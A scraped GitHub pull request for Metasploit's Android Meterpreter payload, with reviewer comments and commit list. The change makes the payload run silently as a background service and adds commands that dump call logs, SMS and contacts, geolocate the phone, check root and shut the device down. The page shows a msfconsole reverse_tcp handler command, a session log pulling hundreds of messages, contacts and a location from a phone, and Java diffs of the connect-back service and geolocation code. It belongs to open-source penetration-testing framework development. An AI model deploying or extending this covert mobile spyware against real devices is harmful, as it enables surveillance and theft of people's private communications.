Skip to content

HTTPS clone URL

Subversion checkout URL

You can clone with HTTPS or Subversion.

Download ZIP

Loading…

enhancing android mainactivity to work as service #3

Closed
wants to merge 9 commits into from

5 participants

@AnwarMohamed

Launcher app was converted to start new service to work through it
instead of the main activity allowing the app to work silently in the
back ground, I have added commands specially for android which can be
called from android commands in the java meterpreter through android
extention

AnwarMohamed added some commits
@AnwarMohamed AnwarMohamed enhancing android mainactivity to work as service
Launcher app was converted to start new service to work through it
instead of the main activity allowing the app to work silently in the
back ground, I have added commands specially for android which can be
called from android commands in the java meterpreter through android
extention
cfaed84
@AnwarMohamed AnwarMohamed android add "check_root" 3c78713
@jlee-r7
Collaborator

This seems to change the default required android version to 4.1.1.4, which is relatively new. Many phones still in stores come with 4.0, and probably even older than that.

Is there a way to make this work for older versions? If not, can we check for support at runtime and fail gracefully?

@AnwarMohamed
@AnwarMohamed

ruby msfconsole -x "sleep 2; use exploit/multi/handler; set payload android/meterpreter/reverse_tcp; set LHOST 10.0.0.2; exploit"

payload => android/meterpreter/reverse_tcp
LHOST => 10.0.0.22
[] Started reverse handler on 10.0.0.22:4444
[
] Starting the payload handler...
[] Sending stage (42777 bytes) to 10.0.0.21
[
] Meterpreter session 1 opened (10.0.0.22:4444 -> 10.0.0.21:39982) at 2013-08-10 18:58:30 +0200

meterpreter > help

Android: Common Commands

Command        Description
-------        -----------
check_root     Check if device is rooted
dump_calllog   Get call log
dump_contacts  Get contacts list
dump_sms       Get sms messages
geolocate      Get current lat-long using geolocation

Android: Rooted Commands

Command          Description
-------          -----------
device_shutdown  Shutdown device

meterpreter > sysinfo
Computer : localhost
OS : Android 4.1.1 (API 16) - Linux 3.0.31-302285 (armv7l)
Meterpreter : java/android

meterpreter > dump_calllog
[] Fetching 164 entries
[
] Call log saved to: E:/metasploit/metasploit-framework/dump_calllog_rjOUMFHN.txt

meterpreter > dump_sms
[] Fetching 896 sms messages
[
] Sms messages saved to: E:/metasploit/metasploit-framework/sms_dump_JQmaoINw.txt

meterpreter > dump_contacts
[] Fetching 618 contacts into list
[
] Contacts list saved to: E:/metasploit/metasploit-framework/contacts_dump_GidUbOsl.txt

meterpreter > geolocate
[*] Current Location:

    Latitude  : 31.2186009
    Longitude : 29.9448264

meterpreter > exit

...ayload/app/src/com/metasploit/stage/StageService.java
((25 lines not shown))
+ public IBinder onBind(Intent arg0) {
+
+ return null;
+ }
+
+ @Override
+ public void onCreate() {
+
+ Toast.makeText(this, "Service Started", Toast.LENGTH_SHORT).show();
+ SharedPreferences prefs = this.getSharedPreferences("com.metasploit.stage", Context.MODE_PRIVATE);
+ LHOST = prefs.getString("LHOST", "127.0.0.1");
+ LPORT = prefs.getString("LPORT", "4444");
+
+ startAsync();
+
+ new Thread()
@timwr Collaborator
timwr added a note

What does this Thread do?

this is to prevent android system from killing the service by keeping the service running all the time

@timwr Collaborator
timwr added a note

AFAIK: the only way to prevent that is to display a notification. http://developer.android.com/reference/android/app/Service.html#startForeground%28int,%20android.app.Notification%29
Perhaps it's better to root and persist :D

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
...ayload/app/src/com/metasploit/stage/StageService.java
((20 lines not shown))
+ private String LHOST, LPORT;
+ private boolean isRunning = true;
+ private Socket msgsock;
+
+ @Override
+ public IBinder onBind(Intent arg0) {
+
+ return null;
+ }
+
+ @Override
+ public void onCreate() {
+
+ Toast.makeText(this, "Service Started", Toast.LENGTH_SHORT).show();
+ SharedPreferences prefs = this.getSharedPreferences("com.metasploit.stage", Context.MODE_PRIVATE);
+ LHOST = prefs.getString("LHOST", "127.0.0.1");
@timwr Collaborator
timwr added a note

Why not just move the LHOST and LPORT fields to this class? I don't see the need to save/load them.

if I did will it affect the payload generation ? "during parsing and replacing the host ip "

@timwr Collaborator
timwr added a note

It's fine, the payload generator replaces all occurrences of '127.0.0.1 ' (note the whitespace) with the LHOST, see https://github.com/rapid7/metasploit-framework/blob/master/modules/payloads/stagers/android/reverse_tcp.rb#L32
You can delete them from the activity too.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
...metasploit/meterpreter/android/geolocate_android.java
((9 lines not shown))
+import com.metasploit.meterpreter.TLVPacket;
+import com.metasploit.meterpreter.command.Command;
+
+public class geolocate_android implements Command {
+
+ private static final int TLV_EXTENSIONS = 20000;
+ private static final int TLV_TYPE_GEO_LAT = TLVPacket.TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 9011);
+ private static final int TLV_TYPE_GEO_LONG = TLVPacket.TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 9012);
+
+ @Override
+ public int execute(Meterpreter meterpreter, TLVPacket request,
+ TLVPacket response) throws Exception {
+
+ LocationManager locationManager;
+ locationManager = (LocationManager)AndroidMeterpreter.getContext().getSystemService(Context.LOCATION_SERVICE);
+ Location location = locationManager.getLastKnownLocation(LocationManager.NETWORK_PROVIDER);
@timwr Collaborator
timwr added a note

What about the other providers? I would do locationManager.getAllProviders(), then loop through and get the most recent/accurate location.

we cannt depend on GPS since it needs root permissions to turn it on

@timwr Collaborator
timwr added a note

We need root to force enable GPS/passive (wifi) but not to get the last known location from it.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
@timwr
Collaborator

Does this really work? Can't you just have a UI-less activity that just does:

@Override
protected void onCreate(Bundle savedInstanceState) {
    super.onCreate(savedInstanceState);
    startService(new Intent(getApplicationContext(), StageService.class));
}
Collaborator

This is probably overkill, but we could use the base class activity like so:

<activity android:name="android.app.Activity">
            <intent-filter>
                <action android:name="android.intent.action.MAIN"/>
                <category android:name="android.intent.category.LAUNCHER"/>
            </intent-filter>
        </activity>
 ```
And start the service within the MyApp extends Application class? I think that's the minimum viable payload.
@todb-r7
Owner

So I'm not going to pretend I'm an android dev in the slightest, but this PR has 130 changed files and is currently in a conflicted state. If someone like @AnwarMohamed or @timwr wants to clean this up, super, but I'm pretty skeptical this is landable in its current state.

@AnwarMohamed
@todb
@timwr
Collaborator

I like the geolocate + https payloads so would love to see this land. I have a few comments but no blockers. It would be easier to manage in smaller chunks though.

@timwr

Why do we need to increase this? Can't we do a version check before loading classes that use apis > 3?
e.g:
if (Build.VERSION.SDK_INT > Build.VERSION_CODES.BLAH) {
mgr.registerCommand("dump_contacts", dump_contacts_android.class);
}

@timwr

We should either use this or remove it.

will be removed

@timwr

Why do we need to change the name?

ohh just for relevance

@timwr
Collaborator

Ping. I love the stuff in this pr. Anything I can do to help it land?

@todb
@AnwarMohamed AnwarMohamed deleted the branch
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Commits on Jul 30, 2013
  1. @AnwarMohamed

    enhancing android mainactivity to work as service

    AnwarMohamed authored
    Launcher app was converted to start new service to work through it
    instead of the main activity allowing the app to work silently in the
    back ground, I have added commands specially for android which can be
    called from android commands in the java meterpreter through android
    extention
  2. @AnwarMohamed
Commits on Aug 10, 2013
  1. @AnwarMohamed

    root commands

    AnwarMohamed authored
Commits on Aug 16, 2013
  1. @AnwarMohamed
  2. @AnwarMohamed

    removed MainActivity

    AnwarMohamed authored
  3. @AnwarMohamed
  4. @AnwarMohamed

    hide titlebar

    AnwarMohamed authored
Commits on Aug 17, 2013
  1. @AnwarMohamed
Commits on Nov 6, 2013
  1. @AnwarMohamed

    mvn config changes

    AnwarMohamed authored
Something went wrong with that request. Please try again.